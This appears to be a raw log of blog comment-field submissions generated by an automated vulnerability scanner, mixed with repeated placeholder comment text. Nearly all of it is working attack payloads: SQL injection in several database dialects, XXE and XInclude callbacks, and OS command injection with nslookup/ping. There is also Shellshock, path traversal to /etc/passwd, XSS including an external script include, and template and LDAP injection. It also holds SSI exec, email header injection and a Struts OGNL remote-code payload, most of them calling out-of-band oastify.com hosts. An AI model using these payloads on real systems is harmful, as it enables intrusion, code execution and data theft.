(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % wuhie SYSTEM "http://kh57kzi0l3gi6r9skns07t7t2k8fw5k880vqjf.oasti'||'fy.com/">%wuhie;]>'),'/l') from dual)
Please post your comments for the blog'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % wuhie SYSTEM "http://ryte16z72axpnyqz1u97o0o0jrpmdc1gp8cy0n.oasti'||'fy.com/">%wuhie;]>'),'/l') from dual)||'
Please post your comments for the blog';declare @q varchar(99);set @q='\7u2uxmvnyqt5jemfxa5nkgkgf7l29sxjo7gu6iv.oasti'+'fy.com\dme'; exec master.dbo.xp_dirtree @q;--
http://648t7l5m8p34tdwe79fmufufp6v1jr7hv9iz6o.oastify.com?Please post your comments for the blog
Please post your comments for the blog&nslookup -q=cname zormrepfsinxd6g7r2zfe8e89zfu3krff72xqm.oastify.com.&'"`0&nslookup -q=cname zormrepfsinxd6g7r2zfe8e89zfu3krff72xqm.oastify.com.&`'
Please post your comments for the blog|echo tn07brn4bs x09me6f68u||a #' |echo tn07brn4bs x09me6f68u||a #|" |echo tn07brn4bs x09me6f68u||a #
Please post your comments for the blog|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #" |ping -n 21 127.0.0.1
Please post your comments for the blog'+(function(){if(typeof um2ml==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);um2ml=1;}}())+'
?><script>alert(?X?)</script>
../../../../../../../../../../../../etc/passwd
0x3c696d67207372633d68747470733a2f2f696d6775722e636f6d2f723844704c44652e6769663e
123456
123456
123456
123456
vultqrztyycvgnqrygwc
123456
123456
<ozwitphgjc>
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
(select*from(select+sleep(0)union/**/select+1)a)
123456
(select*from(select+sleep(2)union/**/select+1)a)
123456
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456'and/**/extractvalue(1,concat(char(126),md5(1864843982)))and'
123456"and/**/extractvalue(1,concat(char(126),md5(1005398260)))and"
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
extractvalue(1,concat(char(126),md5(1664556127)))
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456'and(select'1'from/**/cast(md5(1045448603)as/**/int))>'0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456/**/and/**/cast(md5('1510877079')as/**/int)>0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1173404697')))
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1373102948')))>'0
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456鎈'"\(
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456'"\(
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('o',0)
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('t',2)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('q',0)='q
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',2)='f
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
xzjnpouxfbsmiqutolsn
123456
123456
123456
<gzodyitqbk>
123456
123456
123456
123456
123456
123456
123456'and/**/extractvalue(1,concat(char(126),md5(1033952100)))and'
123456"and/**/extractvalue(1,concat(char(126),md5(1231065076)))and"
123456
123456
123456
extractvalue(1,concat(char(126),md5(1250578077)))
123456
123456
fcdqiwztackiznpewvfc
123456
123456
<ftwfdoqoqp>
123456'and(select'1'from/**/cast(md5(1446263514)as/**/int))>'0
(select*from(select+sleep(0)union/**/select+1)a)
123456
123456
123456
(select*from(select+sleep(2)union/**/select+1)a)
123456/**/and/**/cast(md5('1383294242')as/**/int)>0
123456
123456
123456
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456
123456
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1516474102')))
123456'and/**/extractvalue(1,concat(char(126),md5(1437293287)))and'
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456
123456
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1829784832')))>'0
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456
123456鎈'"\(
123456"and/**/extractvalue(1,concat(char(126),md5(1627327543)))and"
extractvalue(1,concat(char(126),md5(1749573899)))
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456
123456'"\(
123456'and(select'1'from/**/cast(md5(1205417268)as/**/int))>'0
123456
123456
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456/**/and/**/cast(md5('1887100537')as/**/int)>0
123456
123456
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
123456
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1266829714')))
123456
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1503216563')))>'0
123456
123456
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456鎈'"\(
123456
123456
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456'"\(
123456
123456
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456
123456
123456
123456
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('i',0)
123456
123456
123456
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('a',2)
123456
123456
(select*from(select+sleep(0)union/**/select+1)a)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',0)='f
123456
(select*from(select+sleep(2)union/**/select+1)a)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',2)='s
123456
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456
123456
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456
123456
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456
123456
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
123456
123456
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456
123456
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('i',0)
123456
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('r',2)
akhjmpextigikkzmttfn
123456
123456
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('v',0)='v
123456
123456
<bdjxbsfxtb>
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('a',2)='a
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456'and/**/extractvalue(1,concat(char(126),md5(1412917518)))and'
123456
123456"and/**/extractvalue(1,concat(char(126),md5(1745857854)))and"
123456
123456
extractvalue(1,concat(char(126),md5(1592885961)))
123456
(select*from(select+sleep(0)union/**/select+1)a)
123456'and(select'1'from/**/cast(md5(1716201656)as/**/int))>'0
(select*from(select+sleep(2)union/**/select+1)a)
123456/**/and/**/cast(md5('1872725112')as/**/int)>0
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1380500800')))
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
cnmhqcrgrhgodinimnqp
123456
123456
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1754807089')))>'0
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456鎈'"\(
123456
123456
<ogmvtejogi>
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456'"\(
123456
123456
123456
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
123456
123456
123456
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456
123456
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456
123456
123456
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456
(select*from(select+sleep(0)union/**/select+1)a)
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456
(select*from(select+sleep(2)union/**/select+1)a)
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('r',0)
123456
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('r',2)
123456
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('x',0)='x
123456'and/**/extractvalue(1,concat(char(126),md5(1449831584)))and'
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',2)='d
123456"and/**/extractvalue(1,concat(char(126),md5(1870472536)))and"
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
extractvalue(1,concat(char(126),md5(1970628046)))
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456'and(select'1'from/**/cast(md5(1113154379)as/**/int))>'0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456/**/and/**/cast(md5('1869580789')as/**/int)>0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1759315633')))
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1286180644')))>'0
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456鎈'"\(
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456'"\(
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('x',0)
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('g',2)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('c',0)='c
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',2)='s
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
piogjmcllefevztjgpch
123456
123456
<gqepfharen>
123456
123456
123456
123456
123456'and/**/extractvalue(1,concat(char(126),md5(1469833055)))and'
123456
123456
123456"and/**/extractvalue(1,concat(char(126),md5(1176632095)))and"
123456
extractvalue(1,concat(char(126),md5(1755612234)))
123456
123456'and(select'1'from/**/cast(md5(1575553381)as/**/int))>'0
123456
123456/**/and/**/cast(md5('1656165305')as/**/int)>0
123456
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1704903585')))
123456
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1551788122')))>'0
123456
123456
123456鎈'"\(
123456
123456
123456'"\(
123456
123456
123456
123456
(select*from(select+sleep(0)union/**/select+1)a)
123456
(select*from(select+sleep(2)union/**/select+1)a)
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
123456
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('o',0)
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('u',2)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('q',0)='q
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('b',2)='b
123456
sotkioutdvzyrktkkpil
123456
123456
<lrrtdrvznx>
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
(select*from(select+sleep(0)union/**/select+1)a)
123456
(select*from(select+sleep(2)union/**/select+1)a)
123456
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456'and/**/extractvalue(1,concat(char(126),md5(1480365115)))and'
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
123456"and/**/extractvalue(1,concat(char(126),md5(1485333987)))and"
extractvalue(1,concat(char(126),md5(1754295609)))
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456'and(select'1'from/**/cast(md5(1332965469)as/**/int))>'0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456/**/and/**/cast(md5('1567309917')as/**/int)>0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1676922790')))
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1139153723')))>'0
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456鎈'"\(
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456'"\(
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('g',0)
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('e',2)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',0)='y
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('b',2)='b
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
ukdtklzgxnsbbqbmjulj
123456
123456
<dvlmpminkh>
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456'and/**/extractvalue(1,concat(char(126),md5(1610787323)))and'
123456
123456"and/**/extractvalue(1,concat(char(126),md5(1962873740)))and"
123456
extractvalue(1,concat(char(126),md5(1527317433)))
(select*from(select+sleep(0)union/**/select+1)a)
123456'and(select'1'from/**/cast(md5(1166673086)as/**/int))>'0
(select*from(select+sleep(2)union/**/select+1)a)
123456/**/and/**/cast(md5('1389684278')as/**/int)>0
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1756875548')))
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1701812454')))>'0
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456鎈'"\(
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456'"\(
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('g',0)
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('a',2)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('p',0)='p
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',2)='t
123456
123456
123456
123456
aoxljbhdvhaxnzjsfybv
123456
123456
<wcwtrwvesn>
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456'and/**/extractvalue(1,concat(char(126),md5(1175104426)))and'
123456
123456"and/**/extractvalue(1,concat(char(126),md5(1789808013)))and"
123456
123456
extractvalue(1,concat(char(126),md5(1428572271)))
123456
(select*from(select+sleep(0)union/**/select+1)a)
123456'and(select'1'from/**/cast(md5(1494068420)as/**/int))>'0
(select*from(select+sleep(2)union/**/select+1)a)
123456/**/and/**/cast(md5('1149035477')as/**/int)>0
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1981942930')))
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1097706284')))>'0
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456鎈'"\(
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456'"\(
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('x',0)
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('b',2)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('k',0)='k
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',2)='z
<script onerror=alert(1) src=/></script>
foo<script>alert(1)</script>
<script type="text/javascript" src="https://jso-tools.z-x.my.id/raw/~/83ENLA4JLOWNM"></script>
Tes
fas
68856005' or 1191=1191--
68856005' or 1191=1191--
68856005' or 1191=1191--
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % wuhie SYSTEM "http://kh57kzi0l3gi6r9skns07t7t2k8fw5k880vqjf.oasti'||'fy.com/">%wuhie;]>'),'/l') from dual)
Please post your comments for the blog'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % wuhie SYSTEM "http://ryte16z72axpnyqz1u97o0o0jrpmdc1gp8cy0n.oasti'||'fy.com/">%wuhie;]>'),'/l') from dual)||'
Please post your comments for the blog';declare @q varchar(99);set @q='\7u2uxmvnyqt5jemfxa5nkgkgf7l29sxjo7gu6iv.oasti'+'fy.com\dme'; exec master.dbo.xp_dirtree @q;--
(select load_file('\\67btal8mbp64wdzea9imxfxfs6y1mraic64tuhj.oastify.com\kts'))
Please post your comments for the blog'+(select load_file('\\suqfx7v8ybtqjzm0xv58k1k1fsln9dx40ssfi37.oastify.com\gxe'))+'
Please post your comments for the blog'
Please post your comments for the blog'
Please post your comments for the blog
Please post your comments for the blog''
Please post your comments for the blog''
Please post your comments for the blog'(select*from(select(sleep(20)))a)'
Please post your comments for the blog'+(select*from(select(sleep(20)))a)+'
Please post your comments for the blog' waitfor delay'0:0:20'--
Please post your comments for the blog')waitfor delay'0:0:20'--
Please post your comments for the blog'||pg_sleep(20)--
Please post your comments for the blog' AND pg_sleep(20)--
Please post your comments for the blog',''||pg_sleep(20)--
Please post your comments for the blog62804513' or '9730'='9730
Please post your comments for the blog62804513' or '9730'='9730
Please post your comments for the blog38020604' or '4881'='4883
Please post your comments for the blog46331798' or '3759'='3759
Please post your comments for the blog93308559' or '6673'='6673'
Please post your comments for the blog"
Please post your comments for the blog"
9n9bzssd22
Please post your comments for the bloggnq8htm5wf
Please post your comments for the blogalert(1)
Please post your comments for the bloga7h3w<a>are5h
Please post your comments for the bloga7h3w<a>are5h
Please post your comments for the bloga7h3w%3ca%3eare5h
Please post your comments for the bloga7h3w<a>are5h
Please post your comments for the blogyca8d0tmyc><
Please post your comments for the blogyca8d0tmyc><
Please post your comments for the blogyca8d0tmyc%3e%3c
Please post your comments for the blogyca8d0tmyc><
alert(1)
wupri<a>iqqu1
wupri<a>iqqu1
wupri%3ca%3eiqqu1
wupri<a>iqqu1
q7s4lt0k8w><
q7s4lt0k8w><
q7s4lt0k8w%3e%3c
q7s4lt0k8w><
pk045${742*239}g2k21
ymjqq{{148*980}}e7tut
q0wpt#{674*598}l6ung
q6c4d[[477*755]]zkb4e
p91e3${file.separator}w77w5
p5zqm%{578*733}y0710
Please post your comments for the blog}}rwpas'/"<haebi
Please post your comments for the blog%}tksny'/"<d50e3
Please post your comments for the blogzrhff%>nva7q'/"<yss3b
eval(compile('for x in range(1): import time time.sleep(20)','a','single'))
sq26rl0luc4fjj8in1j5
sq26rl0luc4fjj8in1j5
ui7s7bemif%41xryjh19e4c
ui7s7bemif%41xryjh19e4c
jfbyfiubps\lfe7kxkgu3
6vf5lesv72Akppj1z81jr
6vf5lesv72Akppj1z81jr
Please post your comments for the blog7ozcvjpg3wjreyn00846
Please post your comments for the blog7ozcvjpg3wjreyn00846
Please post your comments for the blog4pyq17f031%41zi1oful8tc
Please post your comments for the blog4pyq17f031%41zi1oful8tc
Please post your comments for the blogbfa8q4ocmc\lhchhot7bp
Please post your comments for the blog3cphp5pj22Agepannequ6
Please post your comments for the blog3cphp5pj22Agepannequ6
bn2yqqorrum9cifjqeyrdkdk8be62wqoeg16pv.oastify.com
http://648t7l5m8p34tdwe79fmufufp6v1jr7hv9iz6o.oastify.com?Please post your comments for the blog
Please post your comments for the blog&nslookup -q=cname zormrepfsinxd6g7r2zfe8e89zfu3krff72xqm.oastify.com.&'"`0&nslookup -q=cname zormrepfsinxd6g7r2zfe8e89zfu3krff72xqm.oastify.com.&`'
Please post your comments for the blog|echo tn07brn4bs x09me6f68u||a #' |echo tn07brn4bs x09me6f68u||a #|" |echo tn07brn4bs x09me6f68u||a #
Please post your comments for the blog|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #" |ping -n 21 127.0.0.1
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
Please post your comments for the blog..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
../../../../../../../../../../../../../../../../etc/passwd
Please post your comments for the blog../../../../../../../../../../../../../../../../etc/passwd
.../Please post your comments for the blog
./Please post your comments for the blog
././Please post your comments for the blog
ddh/Please post your comments for the blog
62804513' or '9730'='9730
*)(objectClass=*
*)(!(objectClass=*)
*)(!(!(objectClass=*))
62804513' or '9730'='9730
*)(!(!(!(objectClass=*)))
*)(!(!(!(!(!(objectClass=*)))))
62804513' or '9730'='9730
*)(!(!(!(!(objectClass=*))))
<pht xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://kzn72z0033yiorrs2na0ptptkkqfe525qxdn1c.oastify.com/pht.xsd">pht</pht>
62804513' or '9730'='9730
<oim xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://sqmft7r8ubpqfzi0tv18g1g1bshn5dteh64wsl.oastify.com/foo"/></oim>
Please post your comments for the blog]]>><
Please post your comments for the blog
62804513' or '9730'='9730
Please post your comments for the blog]]>><
Please post your comments for the blog'+(function(){if(typeof um2ml==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);um2ml=1;}}())+'
62804513' or '9730'='9730
"-->'-->`--><!--#set var="svd" value="rucex6v7ya"--><!--#set var="uxf" value="twegz8x90c"--><!--#echo var="svd"--><!--#echo var="uxf"--><!--#exec cmd="nslookup -q=cname ehz1ktiulxgc6l9mkhsu7n7n2e89wzkrifa20qp.oastify.com" -->
Please post your comments for the blog BCC:7goujmhnkqf55e8fjarn6g6g1772vsjkc84vujj@oastify.com kst: f
Please post your comments for the blog> BCC:kg47jzh0k3fi5r8sjnr06t6t1k7fv5jxdl58vwk@oastify.com dpd: v
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
() { :;}; /bin/sleep 0
() { :;}; /bin/sleep 11
`sleep 11`
|sleep 11 & ping -n 11 localhost
$(sleep 11)
${(new java.io.BufferedReader(new java.io.InputStreamReader(((new java.lang.ProcessBuilder(new java.lang.String[]{"timeout","11"})).start()).getInputStream()))).readLine()}${(new java.io.BufferedReader(new java.io.InputStreamReader(((new java.lang.ProcessBuilder(new java.lang.String[]{"sleep","11"})).start()).getInputStream()))).readLine()}
() { _; } >_[$($())] { /bin/sleep 11; }
%{1229*3614}
1517*5657
${6338*8106}
k22z''lvoq
@(7023*3308)
a'a'b"c>?>%}}%%>c<[[?${{%}}cake\
ig7u<!--esi-->hczs<!--esx-->rb3v
{!xmlparser v='<!DOCTYPE a SYSTEM "http://k4px2x78ggmf0yuuhpbx96qwun0do2.oastify.com/xxe"><a></a>'}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping 4bgth2161ejbvx4t51r8ouvk7bd11q.oastify.com -c1').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
Please post your comments for the blog
